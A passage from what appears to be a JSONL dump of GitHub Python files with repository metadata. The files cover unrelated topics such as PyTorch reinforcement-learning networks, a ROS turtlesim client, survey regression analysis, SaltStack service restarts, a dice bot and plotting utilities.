nn.RReLU(),\n 'selu': nn.SELU(),\n 'sigmoid': nn.Sigmoid(),\n 'softplus': nn.Softplus(),\n 'logsoftmax': nn.LogSoftmax(),\n 'softshrink': nn.Softshrink(),\n 'softsign': nn.Softsign(),\n 'tanh': nn.Tanh(),\n 'tanhshrink': nn.Tanhshrink(),\n 'softmin': nn.Softmin(),\n 'softmax': nn.Softmax(dim=1),\n 'none': None\n }\n\n\ndef initialize_weights(initializer):\n def initialize(m):\n if isinstance(m, nn.Linear) or isinstance(m, nn.Conv2d):\n initializer(m.weight)\n if m.bias is not None:\n torch.nn.init.constant_(m.bias, 0)\n return initialize\n\n\ndef create_linear_network(input_dim, output_dim, hidden_units=[],\n hidden_activation='relu', output_activation=None,\n initializer='xavier_uniform'):\n model = []\n units = input_dim\n for next_units in hidden_units:\n model.append(nn.Linear(units, next_units))\n model.append(str_to_activation[hidden_activation])\n units = next_units\n\n model.append(nn.Linear(units, output_dim))\n if output_activation is not None:\n model.append(str_to_activation[output_activation])\n\n return nn.Sequential(*model).apply(\n initialize_weights(str_to_initializer[initializer]))\n\n\ndef create_dqn_base(num_channels, initializer='xavier_uniform'):\n return nn.Sequential(\n nn.Conv2d(num_channels, 32, kernel_size=8, stride=4, padding=0),\n nn.ReLU(),\n nn.Conv2d(32, 64, kernel_size=4, stride=2, padding=0),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=0),\n nn.ReLU(),\n Flatten(),\n ).apply(initialize_weights(str_to_initializer[initializer]))\n\n#自作SAC用\ndef create_dq_network1(num_channels, input_actions , output_dim, hidden_units, initializer = 'xavier_unifrom', ):\n return nn.Sequential(\n # 画像サイズの変化84*84→20*20\n nn.Conv2d(num_channels , 32, kernel_size=8, stride=4),\n # stackするflameは4画像なのでinput_dim=4である、出力は32とする、\n # sizeの計算 size = (Input_size - Kernel_size + 2*Padding_size)/ Stride_size + 1\n nn.ReLU(),\n # 画像サイズの変化20*20→9*9\n nn.Conv2d(32, 64, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1), # 画像サイズの変化9*9→7*7\n nn.ReLU(),\n nn.Flatten(), # 画像形式を1次元に変換\n nn.Linear(64 * 7 * 7, 16), # 64枚の7×7の画像を、256次元のoutputへ\n nn.ReLU(),\n ).apply(initialize_weights(str_to_initializer[initializer]))\n\ndef create_dq_network2(num_channels, input_actions , output_dim, hidden_units, initializer = 'xavier_unifrom', ):\n return nn.Sequential(\n nn.Linear(16 + input_actions ,128),\n nn.ReLU(),\n nn.Linear(128,128),\n nn.ReLU(),\n nn.Linear(128, output_dim)\n ).apply(initialize_weights(str_to_initializer[initializer]))\n\ndef create_policy_network(input_dim, output_dim, hidden_units, initializer = 'xavier_unifrom', ):\n return nn.Sequential(\n # 画像サイズの変化84*84→20*20\n nn.Conv2d(input_dim, 32, kernel_size=8, stride=4),\n # stackするflameは4画像なのでinput_dim=4である、出力は32とする、\n # sizeの計算 size = (Input_size - Kernel_size + 2*Padding_size)/ Stride_size + 1\n nn.ReLU(),\n # 画像サイズの変化20*20→9*9\n nn.Conv2d(32, 64, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1), # 画像サイズの変化9*9→7*7\n nn.ReLU(),\n nn.Flatten(), # 画像形式を1次元に変換\n nn.Linear(64 * 7 * 7, 256), # 64枚の7×7の画像を、256次元のoutputへ\n nn.ReLU(),\n nn.Linear(256,128),\n nn.ReLU(),\n nn.Linear(128,128),\n nn.ReLU(),\n nn.Linear(128, output_dim)\n ).apply(initialize_weights(str_to_initializer[initializer]))\n\n\n\ndef conv_net(env, in_dim, hidden, depth, act_layer):\n # this assumes image shape == (1, 28, 28)\n act_layer = getattr(nn, act_layer)\n n_acts = env.action_space.n\n conv_modules = [\n nn.Conv2d(1, 10, kernel_size=5, stride=2),\n nn.Conv2d(10, 20, kernel_size=5, stride=2),\n nn.Flatten(),\n ]\n fc_modules = []\n fc_modules.append(nn.Linear(320 + in_dim, hidden))\n for _ in range(depth - 1):\n fc_modules += [act_layer(), nn.Linear(hidden, hidden)]\n fc_modules.append(act_layer())\n conv_modules = nn.Sequential(*conv_modules)\n fc_modules = nn.Sequential(*fc_modules)\n return fc_modules, conv_modules\n\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size(0), -1)\n","repo_name":"KDR121/OP3-using-Soft-Actor-Critic","sub_path":"rltorch/network/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9441507360","text":"import copy\n\nn=int(input())\ncount=0\nlst=[[0]*26 for i in range(n)]\nfor i in range(0,n):\n ch = input()\n for j in ch:\n lst[i][ord(j)-65]=lst[i][ord(j)-65]+1\n\nfor i in range(1,n):\n if lst[0]==lst[i]:\n count=count+1\n elif abs(sum(lst[0])-sum(lst[i]))==1:\n check=0\n for j in range(26):\n if lst[0][j] != lst[i][j]:\n check=check+1\n if check==1:\n count=count+1\n elif sum(lst[0])==sum(lst[i]):\n check=0\n for j in range(26):\n if lst[0][j] != lst[i][j]:\n check=check+1\n if check==2:\n count=count+1\n\nprint(count)","repo_name":"ymin96/ACM-ICPC","sub_path":"others/2607.py","file_name":"2607.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36349319210","text":"#! /usr/bin/env python\n\"\"\"\n 生成一只小乌龟\n 准备工作:\n 1.服务话题 /spawn\n 2.服务消息类型 turtlesim/Spawn\n 3.运行前先启动 turtlesim_node 节点\n\n 实现流程:\n 1.导包\n 需要包含 turtlesim 包下资源,注意在 package.xml 配置\n 2.初始化 ros 节点\n 3.创建 service 客户端\n 4.等待服务启动\n 5.发送请求\n 6.处理响应\n\n\"\"\"\n\nimport rospy\nimport sys\nfrom turtlesim.srv import Spawn,SpawnRequest,SpawnResponse\n\nif __name__ == \"__main__\":\n # 2.初始化 ros 节点\n rospy.init_node(\"set_turtle_p\")\n # 3.创建 service 客户端\n client = rospy.ServiceProxy(\"/spawn\",Spawn)\n # 4.等待服务启动\n client.wait_for_service()\n # 5.发送请求\n req = SpawnRequest()\n req.x = 2.0\n req.y = 2.0\n req.theta = -1.57\n req.name = \"my_turtle_p\"\n try:\n response = client.call(req)\n # 6.处理响应\n rospy.loginfo(\"乌龟创建成功!,叫:%s\",response.name)\n except Exception as identifier:\n rospy.loginfo(\"服务调用失败\")\n","repo_name":"Divenire1998/ToolsTutorial","sub_path":"ROS/ROS1/AutolaborCourseCode/ch2_communication1/src/my_turtle_test/scripts/demo03_server_p.py","file_name":"demo03_server_p.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12250833070","text":"\nfrom return_statistics import histogram, boxplot, return_statistics\nimport collections\n\ndef checkEqual1(iterator):\n\t#returns true if all elements of iterator are the same\n\t#this will stop producing a histogram of an array with equal values \n iterator = iter(iterator)\n try:\n first = next(iterator)\n except StopIteration:\n return True\n return all(first == rest for rest in iterator)\n\n\ndef OPGEE_input_sensitivity(OPGEE_data, well_data):\n\n\tprint('\\n~~~~~~~~~~~~~~~ OPGEE SENSITIVITY ~~~~~~~~~~~~~~~\\n')\n\n\tOPGEE_array = collections.OrderedDict()\n\tOPGEE_array_wells = collections.OrderedDict()\n\n\tproj_name = OPGEE_data['assessed field'][OPGEE_data['headings'].index('Field name')]\n\n\tfor i in range(0,len(OPGEE_data['headings'])):\n\t\tOPGEE_array[proj_name + ' - ' + OPGEE_data['headings'][i] + ' (' + OPGEE_data['units'][i] + ')'] = []\n\t\tOPGEE_array_wells[proj_name + ' - ' + OPGEE_data['headings'][i] + ' (' + OPGEE_data['units'][i] + ')'] = []\n\n\n\tfor well in OPGEE_data:\n\t\tif well in well_data:\n\t\t\tfor i in range(0,len(OPGEE_data[well])):\n\t\t\t\ttry:\n\t\t\t\t\tdata = float(OPGEE_data[well][i]) # ensure they are numbers\n\t\t\t\t\tround_average_data = round(float(OPGEE_data['assessed field'][i]),3) # need this for C1 composition\n\t\t\t\t\tif data not in [float(0), float(OPGEE_data['assessed field'][i]), float(OPGEE_data['defaults'][i]), round_average_data]:\n\t\t\t\t\t\t#print(OPGEE_data['headings'][i])\n\t\t\t\t\t\t#print(str(OPGEE_data[well][i]) + ' ' + str(OPGEE_data['assessed field'][i]) + ' ' + str(OPGEE_data['defaults'][i]))\n\t\t\t\t\t\tOPGEE_array[proj_name + ' - ' + OPGEE_data['headings'][i] + ' (' + OPGEE_data['units'][i] + ')'].append(data) \n\t\t\t\t\t\tOPGEE_array_wells[proj_name + ' - ' + OPGEE_data['headings'][i] + ' (' + OPGEE_data['units'][i] + ')'].append(well)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\n\tfor heading in OPGEE_array:\n\t\tarray = OPGEE_array[heading]\n\t\tif len(array) > 0:\n\t\t\tif isinstance(array[0], (int, float)):\n\t\t\t\treturn_statistics(array, heading)\n\t\t\t\thistogram(array, heading)\n\n\n\treturn\n\n\nif __name__ == '__main__':\n\n\tfrom get_well_data import get_formation_well_data\n\tfrom OPGEE_defaults import OPGEE_defaults\n\tfrom search_production_data import search_production_data\n\timport collections\n\tfrom well_search import well_search\n\tfrom general_well_data_analysis import OPGEE_well_data, general_well_data_analysis\n\tfrom production_analysis import production_dates, production_summary, OPGEE_production_data, production_analysis\n\tfrom get_all_post_2005_well_data import get_tight_oil_wells\n\n\tprint('Importing General Well Data') #MONTN1EY\n\t#well_data_function = get_formation_well_data() # MONTNEY\n\t#well_data_function = well_search()\n\twell_data_function = get_tight_oil_wells()\n\n\twell_data_headings = well_data_function[0] # MONTNEY\n\twell_data = well_data_function[1] # MONTNEY\n\tfield_name = 'Montney'\n\n\tOPGEE_data = OPGEE_defaults()\n\n\tOPGEE_data = general_well_data_analysis(well_data_headings, well_data, OPGEE_data, field_name)\n\n\tOPGEE_data = OPGEE_well_data(well_data, well_data_headings, OPGEE_data)\n\n\tproduction_data_headings, production_data, production_well_data, production_well_data_headings = search_production_data(well_data)\n\n\tOPGEE_data = production_analysis(well_data, well_data_headings, production_data, production_data_headings, OPGEE_data)\n\n\tOPGEE_input_sensitivity(OPGEE_data, well_data)\n\n","repo_name":"parissamj/COEA","sub_path":"runfiles-2018/OPGEE_input_sensitivity.py","file_name":"OPGEE_input_sensitivity.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40871585718","text":"import os\nimport traceback\n\nimport xlrd\nimport logging\n\nlongitude_col = 1\nlatitude_col = 2\naltitude_col = 3\nindex_col = 4\nname_eng_col = 6\nformula_col = 8\nprovider_col = 9\n\n\ndef handle_float(number):\n try:\n float_num = float(number)\n return float_num\n except ValueError:\n try:\n new_float_num = float(number.replace(',', '.'))\n return new_float_num\n except ValueError:\n logging.error(\"Incorrect value in excel file\")\n logging.error(traceback.format_exc())\n raise Exception('There is xlsx not numerical value in excel file')\n\n\ndef get_xlsfile_data(filename):\n wb = xlrd.open_workbook(filename)\n sheet = wb.sheet_by_index(0)\n rows_amount = sheet.nrows\n providers = {}\n provider_data = {}\n provider = ''\n for i in range(2, rows_amount):\n row = sheet.row_values(i)\n if row[0] != '':\n provider = row[provider_col]\n index = row[index_col]\n try:\n longitude = handle_float(row[longitude_col])\n latitude = handle_float(row[latitude_col])\n altitude = handle_float(row[altitude_col])\n formula = handle_float(row[formula_col])\n except ValueError:\n logging.error(f\"Problem happened in {i} row of your excel file\")\n name_eng = row[name_eng_col]\n provider_data[index] = {\"longitude\": longitude, \"latitude\": latitude,\n \"altitude\": altitude, \"name_eng\": name_eng, \"formula\": formula}\n elif row[0] == '' and len(provider_data) != 0:\n providers[provider] = provider_data\n provider_data = {}\n if i == rows_amount - 1:\n providers[provider] = provider_data\n return providers\n","repo_name":"vovapasko/TextParser2","sub_path":"tools/excel_tools.py","file_name":"excel_tools.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7290271415","text":"def services_restarted(name, exclude_services_globs=None, exclude_paths=None):\n exclude_services_globs = exclude_services_globs or []\n exclude_paths = exclude_paths or []\n\n test = __opts__[\"test\"]\n ret = dict(name=name, result=False, changes={}, comment=\"\")\n r = __salt__[\"maint.restart_services\"](\n test=test,\n exclude_services_globs=exclude_services_globs,\n exclude_paths=exclude_paths,\n )\n kernel = __salt__[\"maint.get_kernel_reboot_required\"]()\n xen = __salt__[\"maint.get_xen_reboot_required\"]()\n comment = [\"needs-restart report:\\n\" + r[\"report\"]]\n if r[\"failed\"]:\n comment.append(\n \"Failed services:\\n%s\"\n % \"\\n\".join([\"- %s: %s\" % (k, v) for k, v in r[\"failed\"].items()])\n )\n else:\n ret[\"result\"] = True\n if r[\"restarted\"]:\n ret[\"changes\"] = {\"restarted\": r[\"restarted\"]}\n if test:\n ret[\"result\"] = None\n comment.append(\n \"Restarted services:\\n%s\" % \"\\n\".join([\"- %s\" % k for k in r[\"restarted\"]])\n )\n if r[\"nonrestartable\"]:\n comment.append(\n \"Nonrestartable services:\\n%s\"\n % \"\\n\".join([\"- %s\" % k for k in r[\"nonrestartable\"]])\n )\n if kernel:\n comment.append(kernel)\n if xen:\n comment.append(xen)\n ret[\"comment\"] = \"\\n\\n\".join(comment) if comment else None\n return ret\n","repo_name":"Rudd-O/saltstack-automation","sub_path":"extmods/states/maint.py","file_name":"maint.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"74991729928","text":"def main():\n image_types = [\"gif\", \"jpg\", \"jpeg\", \"png\"]\n application_types = [\"pdf\", \"zip\"]\n\n file_name = input(\"File name: \").lower().strip()\n file_ext = file_name.split(\".\")[-1] \n\n if file_ext in image_types:\n if file_ext in [\"jpg\", \"jpeg\"]:\n print(\"image/jpeg\")\n else:\n print(\"image/\", file_ext, sep=\"\")\n\n elif file_ext in application_types:\n print(\"application/\", file_ext, sep=\"\")\n elif file_ext == \"txt\":\n print(\"text/plain\")\n else:\n print(\"application/octet-stream\")\n\nmain()","repo_name":"josephbak/cs50-python","sub_path":"problems/problem1/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70626832008","text":"import pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt \nimport statsmodels.formula.api as smf\nimport statsmodels.api as sm\nimport scipy.stats as stats \nimport seaborn as sns\n\nprint ('reading data file...')\ndata = pd.read_csv('nesarc_pds.csv', low_memory=False)\ndata.columns = map(str.upper, data.columns)\n\n# bug fix for display formats to avoid run time errors - put after code for loading data above\npd.set_option('display.float_format', lambda x:'%f'%x)\npd.set_option('display.max_rows', None)\n# Current drinkers(CONSUMER - DRINKING STATUS ) Either 1 (yes) or 2(no) to (S7Q31A - EVER DRANK ALCOHOL TO AVOID SOCIAL PHOBIA)\ndrinkerstemp=data[(data['CONSUMER'] ==1) & ((data['S7Q31A']=='1') | (data['S7Q31A']=='2'))]\n\n#Binary variables are all of the form (1 -yes,2 - no,9 -unkown,NA) - this fixes them\nmapper = ({1:1,2:0})\n\n#Get rid of everything unneeded \ndrinkers = drinkerstemp[['AGE','SEX','S7Q31A','S2AQ8B','S2AQ8C',\n'S2AQ10','S2BQ1A2','S2BQ1A4','S2BQ1A7', 'S2BQ1A8','S2BQ3B', \n'S7Q1','S7Q2','S7Q3','S7Q4A1','S7Q4A2','S7Q4A3','S7Q4A4','S7Q4A5','S7Q4A6','S7Q4A7','S7Q4A8','S7Q4A9',\n'S7Q4A10','S7Q4A11','S7Q4A12','S7Q4A13','S7Q4B','S7Q5','S7Q6']].copy()\n\ndel drinkerstemp \ndel data\n\nfor col in drinkers: # Convert columns to numeric and replace 99's and nulls\n drinkers[col] = pd.to_numeric(drinkers[col],errors='coerce')\n drinkers[col]=drinkers[col].replace(99 ,np.nan).fillna(np.nan)\n\nfor col in ['S2BQ1A2','S2BQ1A4','S2BQ1A7']: # Set missing values to Nan\n drinkers[col]=drinkers[col].replace(9 ,np.nan).fillna(np.nan)\n\n#Fix yes/no to binary \nfor col in ['SEX','S7Q31A','S7Q1','S7Q2','S7Q3','S7Q4A1','S7Q4A2','S7Q4A3','S7Q4A4','S7Q4A5','S7Q4A6','S7Q4A7','S7Q4A8','S7Q4A9',\n'S7Q4A10','S7Q4A11','S7Q4A12','S7Q4A13','S7Q4B','S7Q5','S7Q6']:\n drinkers[col] = drinkers[col].map(mapper)\n\ndel col\ndel mapper\n \n#Add up all the drinkers Social anxiety symptoms\ndrinkers['sa_symptoms'] = drinkers[['S7Q1','S7Q2','S7Q3','S7Q4A1','S7Q4A2','S7Q4A3','S7Q4A4','S7Q4A5','S7Q4A6','S7Q4A7','S7Q4A8','S7Q4A9',\n'S7Q4A10','S7Q4A11','S7Q4A12','S7Q4A13','S7Q4B','S7Q5','S7Q6']].sum(axis=1)\n\n#Center quantitatives\ndrinkers['maxdrinks_c'] = (drinkers['S2AQ8C'] - drinkers['S2AQ8C'].mean())\ndrinkers['usualdrinks_c'] = (drinkers['S2AQ8B'] - drinkers['S2AQ8B'].mean())\ndrinkers['age_c'] = (drinkers['AGE'] - drinkers['AGE'].mean())\ndrinkers['sa_symptoms_c'] = (drinkers['sa_symptoms'] - drinkers['sa_symptoms'].mean())\n\n#DATA MANAGEMENT END----------------------------------------------------------------------------------------------------\n\n#Testing a linear regression model\n\n#Linear regression - social anxiety and incidents of abuse \nmodel1 = smf.ols('S2BQ3B ~ S7Q31A',data=drinkers).fit()\nprint(model1.summary()) \n\n#Testing a logistic regression model\n\n# likelihood of social anxiety for those who have ever had to drink more to get wanted effect\n#S2BQ1A2 - EVER HAD TO DRINK MORE TO GET THE EFFECT WANTED'\n#S2BQ1A4 - EVER INCREASE DRINKING BECAUSE AMOUNT FORMERLY CONSUMED NO LONGER GAVE DESIRED EFFECT'\nlreg = smf.logit('S7Q31A ~ S2BQ1A2 + S2BQ1A4',data= drinkers).fit()\nprint(lreg.summary())\n\nprint('Odds Ratios')\nparams = lreg.params\nconf = lreg.conf_int()\nconf['OR'] = params\nconf.columns = ['Lower CI','Upper CI','OR']\n\nprint(np.exp(conf))\n\n#Controlling for an extra categorical predictor \n#S2BQ1A7 - EVER HAVE PERIOD WHEN ENDED UP DRINKING MORE THAN INTENDED\nlreg2 = smf.logit('S7Q31A ~ S2BQ1A2 + S2BQ1A4 + S2BQ1A7',data= drinkers).fit()\nprint(lreg2.summary())\n\nprint('Odds Ratios')\nparams = lreg2.params\nconf = lreg2.conf_int()\nconf['OR'] = params\nconf.columns = ['Lower CI','Upper CI','OR']\n\nprint(np.exp(conf))\n\n#CONSUMER - (1 current drinker, 2 ex drinker, 3 lifetime abstainer)\n#S7Q31A - EVER DRANK ALCOHOL TO AVOID SOCIAL PHOBIA (1:yes,2:no,9:Unknown, BL: N/A)\n\n#S2AQ10 - HOW OFTEN DRANK ENOUGH TO FEEL INTOXICATED IN LAST 12 MONTHS' (1-11.99, N/A)\n#S2AQ8B NUMBER OF DRINKS OF ANY ALCOHOL USUALLY CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS (1-98,99,BL)\n#S2AQ8C LARGEST NUMBER OF DRINKS OF ANY ALCOHOL CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS (1-98,99,BL)\n\n#S2BQ1A2 - EVER HAD TO DRINK MORE TO GET THE EFFECT WANTED'\n#S2BQ1A4 - EVER INCREASE DRINKING BECAUSE AMOUNT FORMERLY CONSUMED NO LONGER GAVE DESIRED EFFECT'\n\n#S2BQ1A7 - EVER HAVE PERIOD WHEN ENDED UP DRINKING MORE THAN INTENDED'\n#S2BQ1A8 - EVER HAVE PERIOD WHEN KEPT DRINKING LONGER THAN INTENDED'\n\n#S2BQ3B - NUMBER OF EPISODES OF ALCOHOL ABUSE\n\n# -*- coding: utf-8 -*-\n\n","repo_name":"jamesrmccallum/Coursera","sub_path":"logit_regression.py","file_name":"logit_regression.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20792834013","text":"import re\nimport random\nimport sys\n\ntrigger = re.compile(\"^!dice\")\nkeywords = [\"dice\", \"golf\"]\n\nmatch_pattern = re.compile(r\"^!dice\\s+(\\d+)d(\\d+)(?:([+-])(\\d+))?\")\n\nasync def action(bot, msg):\n \"\"\"**!dice** _dice_**d**_sides_[+|-_modifier_]\nSimulate a dice roll. _Dice_ is the number of dice to roll and _sides_ is the number of sides each die has. Optionally you can specify _modifier_, prefixed with + or -.\n`!dice 1d20+3`\n \"\"\"\n match = match_pattern.match(msg.clean_content)\n\n if match:\n match_grps = match.groups()\n dice_count = int(match_grps[0])\n dice_sides = int(match_grps[1])\n\n if match_grps[2] and match_grps[3]:\n modifier_sign = match_grps[2]\n modifier = int(match_grps[3])\n if modifier_sign == \"-\":\n modifier = -modifier\n else:\n modifier = 0\n\n if dice_count < sys.maxsize and dice_sides < sys.maxsize and modifier < sys.maxsize:\n result = random.randint(dice_count, dice_count * dice_sides) + modifier\n await bot.send_message(msg.channel, str(result))\n","repo_name":"jtuu/ca.py-bot","sub_path":"src/plugins/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17597062714","text":"# 한수 >> 각 자리가 등차수열\nimport math\n\nnum = int(input())\n\ndef hansoo(n) :\n res = []\n for i in range(1, n+1) :\n new = str(i)\n if len(new) == 1 :\n res.append(i)\n elif len(new) == 2 :\n res.append(i)\n else :\n std = len(new)\n if std % 2 == 1 :\n for j in range(std-2) :\n if int(new[j+1]) - int(new[j]) == int(new[j+2]) - int(new[j+1]) :\n res.append(i)\n return(len(res))\n\nprint(hansoo(num))\n\n \n\n \n \n","repo_name":"tldjfj123/PS","sub_path":"BOJ/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8761706604","text":"import os.path\nfrom blend2bam.common import Settings\nfrom blend2bam.cli import convert\n\nSETTINGS = Settings()\n\nTESTDIR = os.path.dirname(os.path.abspath(__file__))\nSRCDIR = os.path.join(TESTDIR, 'assets')\n\n\ndef test_edit_mode(tmpdir):\n convert(SETTINGS, SRCDIR,\n [os.path.join(SRCDIR, 'edit_mode.blend')],\n os.path.join(tmpdir, 'edit_mode.bam'),\n )\n\n\ndef test_pose_mode(tmpdir):\n convert(SETTINGS, SRCDIR,\n [os.path.join(SRCDIR, 'pose_mode.blend')],\n os.path.join(tmpdir, 'pose_mode.bam'),\n )\n","repo_name":"Moguri/blend2bam","sub_path":"tests/test_blend2gltf.py","file_name":"test_blend2gltf.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"16"} +{"seq_id":"16024542702","text":"import collections\nimport random\nimport queue\nevent = collections.namedtuple('event', 'time id action')\n\n\ndef events(start_time, id, trip_num):\n time = yield event(start_time, id, 'leave home')\n for i in range(trip_num):\n time = yield event(time, id, 'pick up')\n time = yield event(time, id, 'drop')\n\n yield event(id, time, 'go home')\n\nclass Sim:\n def __init__(self,taxi_num):\n self.events = queue.PriorityQueue()\n self.taxi_dict = dict()\n for i in range(taxi_num):\n self.taxi_dict[i] = events(random.randint(1,5),i,random.randint(10,20))\n x = next(self.taxi_dict[i])\n print(x)\n self.events.put(x)\n\n def run(self):\n\n while True:\n evn = self.events.get()\n tmp_time,tmp_id,tmp_action = evn\n try:\n next_time = tmp_time+random.randint(2,4)\n next_env = self.taxi_dict[tmp_id].send(next_time)\n except StopIteration:\n print('end')\n else:\n self.events.put(next_env)\n print(next_env)\n\nsim = Sim(5)\nsim.run()","repo_name":"nie000/mylinuxlearn","sub_path":"rimi_linux_mysql/tcp_ip_socket/yield_from/taxi_sim_example/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28320422414","text":"from typing import Optional, List, Callable, Dict, Tuple, Union, TYPE_CHECKING, Literal\nfrom tqdm import tqdm\nfrom sklearn.utils import resample\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nfrom matplotlib.patches import BoxStyle\nfrom matplotlib.colors import LinearSegmentedColormap\n\nif TYPE_CHECKING:\n from matplotlib.axes import Axes\n\n\ndef bootstrap(metric_function: Callable, input_resample: List[np.ndarray], n_bootstraps: int, metric_kwargs: Dict={}) -> List:\n \"\"\"\n A bootstrapping function for a metric function. The metric function should take the same number of arguments as the length of input_resample.\n\n Parameters\n ----------\n metric_function : Callable\n The metric function to use. Should take the same number of arguments as the length of input_resample.\n input_resample : List[np.ndarray]\n A list of arrays to resample. The arrays should have the same length. The arrays are passed to the metric function.\n n_bootstraps : int\n The number of bootstrap iterations.\n metric_kwargs : Dict\n Keyword arguments to pass to the metric function.\n\n Returns\n -------\n List\n A list of the metric function results for each bootstrap iteration.\n \"\"\"\n results = []\n # for each bootstrap iteration\n for _ in tqdm(range(n_bootstraps), desc='Bootsrapping', leave=True):\n # resample indices with replacement\n indices = resample(np.arange(len(input_resample[0])), replace=True)\n input_resampled = [x[indices] for x in input_resample]\n # calculate metric\n result = metric_function(*input_resampled, **metric_kwargs)\n \n results.append(result)\n \n return results\n\n\n\nclass ExtendedTextBox_v2:\n \"\"\"\n Black background boxes for titles in maptlolib subplots\n \n From:\n https://stackoverflow.com/questions/40796117/how-do-i-make-the-width-of-the-title-box-span-the-entire-plot\n https://matplotlib.org/stable/gallery/userdemo/custom_boxstyle01.html?highlight=boxstyle+_style_list\n \"\"\"\n\n def __init__(self, pad=0.3, width=500.):\n \"\"\"\n The arguments must be floats and have default values.\n\n Parameters\n ----------\n pad : float\n amount of padding\n \"\"\"\n self.width = width\n self.pad = pad\n super().__init__()\n\n def __call__(self, x0, y0, width, height, mutation_size):\n \"\"\"\n Given the location and size of the box, return the path of the box\n around it.\n\n Rotation is automatically taken care of.\n\n Parameters\n ----------\n x0, y0, width, height : float\n Box location and size.\n mutation_size : float\n Reference scale for the mutation, typically the text font size.\n \"\"\"\n # padding\n pad = mutation_size * self.pad\n # width and height with padding added\n #width = width + 2.*pad\n height = height + 3 * pad\n # boundary of the padded box\n y0 = y0 - pad # change this to move the text\n y1 = y0 + height \n _x0 = x0\n x0 = _x0 +width /2. - self.width/2.\n x1 = _x0 +width /2. + self.width/2.\n # return the new path\n return Path([(x0, y0),\n (x1, y0), (x1, y1), (x0, y1),\n (x0, y0)],\n closed=True)\n\n\ndef _set_black_title_box(ax: \"Axes\", title:str, backgroundcolor='black', color='white', title_kwargs: Optional[Dict]=None):\n \"\"\"\n Note: Do not use this function by itself, instead use `set_black_title_boxes()`.\n Sets the title of the given axes with a black bounding box.\n Note: When using `plt.tight_layout()` the box might not have the correct width. First call `plt.tight_layout()` and then `set_black_title_box()`.\n\n Parameters:\n - ax: The matplotlib.axes.Axes object to set the title for.\n - title: The title string to be displayed.\n - backgroundcolor: The background color of the title box (default: 'black').\n - color: The color of the title text (default: 'white').\n - set_title_kwargs: Keyword arguments to pass to `ax.set_title()`.\n \"\"\"\n if title_kwargs is None:\n title_kwargs = {'fontdict': {\"fontname\": \"Arial Black\", \"fontweight\": \"bold\"}}\n BoxStyle._style_list[\"ext\"] = ExtendedTextBox_v2 \n ax_width = ax.get_window_extent().width\n # make title with black bounding box\n title_instance = ax.set_title(title, backgroundcolor=backgroundcolor, color=color, **title_kwargs)\n bb = title_instance.get_bbox_patch() # get bbox from title\n bb.set_boxstyle(\"ext\", pad=0.1, width=ax_width) # use custom style\n \n \ndef set_black_title_boxes(axes: \"np.ndarray[Axes]\", titles: List[str], backgroundcolor='black', color='white', title_kwargs: Optional[Dict]=None, tight_layout_kwargs: Dict={}):\n \"\"\"\n Creates black boxes for the subtitles above the given axes with the given titles. The subtitles are centered above the axes.\n\n Parameters\n ----------\n axes : np.ndarray[\"Axes\"]\n np.ndarray of matplotlib.axes.Axes objects. (Usually returned by plt.subplots() call)\n titles : List[str]\n List of titles for the axes. Same length as axes.\n backgroundcolor : str, optional\n Background color of boxes, by default 'black'\n color : str, optional\n Font color, by default 'white'\n title_kwargs : Dict, optional\n kwargs for the `ax.set_title()` call, by default {}\n tight_layout_kwargs : Dict, optional\n kwargs for the `plt.tight_layout()` call, by default {}\n \"\"\"\n\n for i, ax in enumerate(axes.flat):\n _set_black_title_box(ax, titles[i], backgroundcolor, color, title_kwargs)\n \n plt.tight_layout(**tight_layout_kwargs)\n \n for i, ax in enumerate(axes.flat):\n _set_black_title_box(ax, titles[i], backgroundcolor, color, title_kwargs)\n \n \n return\n \n \n \n \ndef scale_ax_bbox(ax: \"Axes\", factor: float):\n # Get the current position of the subplot\n box = ax.get_position()\n\n # Calculate the new width and the adjustment for the x-position\n new_width = box.width * factor\n adjustment = (box.width - new_width) / 2\n\n # Set the new position\n ax.set_position([box.x0 + adjustment, box.y0, new_width, box.height])\n \n return\n\n\n\ndef get_cmap(cmap_name: str, n_colors: Optional[int]=None) -> Tuple[LinearSegmentedColormap, Tuple]:\n \"\"\"\n 